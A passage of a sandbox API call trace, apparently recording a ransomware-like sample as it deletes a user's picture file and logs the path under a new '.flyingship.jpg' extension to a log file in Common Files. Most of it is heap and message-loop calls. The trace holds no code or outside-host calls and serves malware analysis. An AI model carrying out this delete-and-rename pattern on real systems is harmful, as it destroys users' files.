wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.899] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zvog.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0191.899] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.899] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.900] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.900] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.900] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.900] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.900] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.901] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.901] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.901] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.901] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFilePart=0x0) returned 0x2f [0191.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0x1793a1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0x90af58 [0191.901] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zvog.jpg")) returned 1 [0191.904] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0x1793a1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0 [0191.904] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.905] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.906] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.906] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.906] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.907] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.907] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.907] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.907] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.907] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.908] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.908] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x32f3, lpOverlapped=0x0) returned 1 [0191.908] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x32f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0191.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db180 [0191.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\n", cchWideChar=61, lpMultiByteStr=0x8db180, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 61 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.909] WriteFile (in: hFile=0x158, lpBuffer=0x8db2e8*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db2e8*, lpNumberOfBytesWritten=0x87f43c*=0x3c, lpOverlapped=0x0) returned 1 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.909] CloseHandle (hObject=0x158) returned 1 [0191.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.911] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.920] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.921] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.921] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.921] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.922] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.922] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.923] RtlAllocateHeap 